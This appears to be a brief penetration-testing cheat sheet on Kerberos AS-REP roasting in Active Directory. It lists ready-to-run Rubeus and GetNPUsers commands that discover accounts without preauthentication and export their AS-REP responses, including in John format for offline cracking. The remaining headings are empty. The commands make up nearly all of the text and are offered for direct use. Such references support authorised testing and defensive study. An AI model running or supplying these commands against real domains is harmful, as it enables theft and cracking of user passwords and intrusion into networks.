Exploitation - Kerberos AS_REP roasting
Overview
Automated DONT_REQ_PREAUTH user accounts discovery and export of AS-REP responses
Rubeus.exe asreproast /outfile:<FILE>
Rubeus.exe asreproast /format:john /outfile:<FILE>
Rubeus.exe asreproast /creduser:'<DOMAIN_FQDN>\<USERNAME>' /credpassword:'<PASSWORD>' /dc:<DC_HOSTNAME | DC_IP> /domain:<DOMAIN_FQDN> /outfile:<FILE_PATH>
# Will attempt to request a TGT for all users.
GetNPUsers.py -request <DOMAIN>/<USERNAME>[:<PASSWORD>]DONT_REQ_PREAUTH user accounts discovery
Request and export of KRB_AS_REP responses
Offline cracking of KRB_AS_REP responses
References
Last updated